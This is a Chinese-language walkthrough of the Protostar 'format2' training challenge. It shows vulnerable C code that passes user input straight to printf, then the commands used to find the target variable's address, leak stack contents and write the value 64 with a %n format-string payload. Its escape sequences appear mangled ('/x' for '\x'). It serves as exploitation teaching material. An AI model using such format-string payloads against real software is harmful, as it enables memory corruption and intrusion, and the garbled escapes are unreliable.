AboutThis level moves on fromformat1and shows how specific values can be written in memory.This leve

About

..This level moves on from format1 and shows how specific values can be written in memory...This level is at /opt/protostar/bin/format2.

Source code

....#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);
printf(buffer);

if(target == 64) {
    printf("you have modified the target :)/n");
} else {
    printf("target is %d :(/n", target);
}
}

int main(int argc, char **argv)
{
vuln();
}..
..这题与上题有点区别：1、传参改为fgets；2、target=64..同样需要找到target的位置....user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
080496e4 g         O .bss     00000004                            target..
..同样先找出赋值动作的位置：....user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa"+"%x."*150' | ./format2
aaaaaaaa200.b7fd8420.bffff624.61616161.61616161.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.a2e78.b7eada75.b7fd7ff4.80496b0.bffff7c8.8048338.b7ff1040.80496b0.bffff7f8.80484f9.b7fd8304.b7fd7ff4.80484e0.bffff7f8.b7ec6365.b7ff1040.bffff7f8.80484c6.80484e0.0.bffff878.b7eadc76.1.bffff8a4.bffff8ac.b7fe1848.bffff860.ffffffff.b7ffeff4.8048285.1.bffff860.b7ff0626.
target is 0 :(..
..nice，这次很近。同样确认一下位置：....user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa%x%x%x%x"' | ./format2
aaaaaaaa200b7fd8420bffff62461616161
target is 0 :(..按照上一题的做法看看会发生什么事情：....user@protostar:/opt/protostar/bin$ python -c 'print "/xe4/x96/x04/x08aaaa%x%x%x%n"' | ./format2
aaaa200b7fd8420bffff624
target is 27 :(..OK，这里已经成功更改了target的值了，题目要求是64，只需要将%x固定长度输出即可：....user@protostar:/opt/protostar/bin$ python -c 'print "/xe4/x96/x04/x08aaaa%40x%x%x%n"' | ./format2
aaaa                                                                         200b7fd8420bffff624
you have modified the target :)..
..
..
..
..

目录CONTENT

Protostar format2

About

Source code

评论区